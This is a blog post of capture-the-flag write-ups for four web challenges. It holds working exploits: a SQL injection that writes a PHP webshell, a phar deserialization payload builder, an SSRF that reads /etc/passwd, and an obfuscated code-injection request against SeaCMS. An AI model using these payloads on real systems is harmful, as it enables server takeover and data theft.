纵横杯

2020-12-28 10:12:00
ctf - wp - 纵横杯

easyci

注apache配置文件出来得到web路径为:/var/sercet/html/

写shell,大小写绕过

password=a&username=-1' uNion sElect 1,'<?php eval($_POST[1]);?>' into outfile '/var/sercet/html/9.php'--+

hello_php

www.zip源码泄露,看到index.php处使用文件功能,可以用phar反序列化:

if(isset($_GET['img'])&&file_exists($_GET['img'])){?>

class.php反序列化:

<?php
class Config{
    public $title;
    public $comment;
    public $logo_url;
    public function __construct(){
        global $title;
        global $comment;
        global $logo_url;
        $this->title= $title = "';@eval(\$_POST[1]);#";
        $this->comment = $comment;
        $this->logo_url = $logo_url;
    }

}

@unlink("test.phar");
$phar = new Phar("test.phar");//后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");//设置stub
$o = new Config;
$phar->setMetadata($o);//将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test");//添加要压缩的文件
$phar->stopBuffering();

?>

burp开两个测试器,一个跑本地一个跑远程,得到本地文件名去远程测试即可。

index.php?img=phar:///var/www/html/static/文件名

有disable直接用蚁剑的gc uaf可以绕。

ezcms

admin进后台,www.zip源码泄露,得到密码为admin868

后台采集处有ssrf,依旧是不存在协议当file协议来绕过:

1.html:

<test123><a href="httpssss://../../../../../../../etc/passwd">123</a></test123>

测试采集:

大家一起来审代码

源码泄露。

adm1n进入后台,admin/admin

后台微信处getshell,因为过滤了$$arg=preg_replace("/a|e|i|o|u|s|t/i","",$$arg);取反绕过即可。

POST /adm1n/admin_weixin.php?action=set HTTP/1.1
Host: eci-2ze2xgy7q3q9edsdmd7w.cloudeci1.ichunqiu.com
Content-Length: 1261
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://eci-2ze2xgy7q3q9edsdmd7w.cloudeci1.ichunqiu.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://eci-2ze2xgy7q3q9edsdmd7w.cloudeci1.ichunqiu.com/adm1n/admin_weixin.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: UM_distinctid=1746b9caf38693-09a14450333cf8-15306251-13c680-1746b9caf39ab2; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; ci_session=7fa6d0a1c78ce02642071b4aa8511786f7b96bdd; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1608730799,1608820977,1608947441,1608967589; PHPSESSID=fccfe38c7ba32cec553d6eb1ad0f47a3; __jsluid_h=31bcf1d6a1527084ce154181595f143f; __51cke__=; __tins__21018907=%7B%22sid%22%3A%201608970730807%2C%20%22vd%22%3A%204%2C%20%22expires%22%3A%201608972789490%7D; __51laig__=4; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1608971221
Connection: close

isopen=n&url=https%3A%2F%2Fwww.seacms.net&title=%E6%B5%B7%E6%B4%8B%E5%BD%B1%E8%A7%86&ckmov_url=https%3A%2F%2Fwww.seacms.net%2Fvip.php%3Furl%3D+&dpic=https%3A%2F%2Fwww.seacms.net%2Fapi%2Fwx.jpg&follow=%E6%84%9F%E8%B0%A2%E6%82%A8%E7%9A%84%E5%85%B3%E6%B3%A8%E3%80%82&noc=%E6%9A%82%E6%97%A0%E4%BD%A0%E8%A6%81%E7%9A%84%E5%86%85%E5%AE%B9%E3%80%82&help=%E8%BF%99%E6%98%AF%E5%B8%AE%E5%8A%A9%E4%BF%A1%E6%81%AF%E3%80%82&topage=d&dwz=n&dwztoken=dwztoken&sql_num=15&msg1a=%E5%85%B3%E9%94%AE%E8%AF%8D1&msg1b=%E5%85%B3%E9%94%AE%E8%AF%8D%E5%9B%9E%E5%A4%8D%E7%9A%84%E5%86%85%E5%AE%B91&msg2a=%E5%85%B3%E9%94%AE%E8%AF%8D2&msg2b=%E5%85%B3%E9%94%AE%E8%AF%8D%E5%9B%9E%E5%A4%8D%E7%9A%84%E5%86%85%E5%AE%B92%3Ca+href%3D%27http%3A%2F%2Fwww.seacms.net%27%3E%E9%93%BE%E6%8E%A5%E6%B5%8B%E8%AF%95%3C%2Fa%3E%EF%BC%8C%E6%B5%8B%E8%AF%95%E7%BB%93%E6%9D%9F%E3%80%82&msg3a=%E5%85%B3%E9%94%AE%E8%AF%8D3&msg3b=%E5%85%B3%E9%94%AE%E8%AF%8D%E5%9B%9E%E5%A4%8D%E7%9A%84%E5%86%85%E5%AE%B93&msg4a=%E5%85%B3%E9%94%AE%E8%AF%8D4&msg4b=%E5%85%B3%E9%94%AE%E8%AF%8D%E5%9B%9E%E5%A4%8D%E7%9A%84%E5%86%85%E5%AE%B94&msg5a=%E5%85%B3%E9%94%AE%E8%AF%8D5&msg5b=%3Ca+href%3D%27https%3A%2F%2Fwww.seacms.net%27%3E%E9%93%BE%E6%8E%A5%3C%2Fa%3E1231");$z='%8C%86%8C%8B%9A%92';$p=~'%9C%9E%8B%DF%D0%99%93%9E%98';$z=~$z;$z($p);//

之后访问admin/weixin.php即可。



本文原创于HhhM的博客,转载请标明出处。



CopyRight © 2019-2020 HhhM
Power By Django & Bootstrap
已运行
粤ICP备19064649号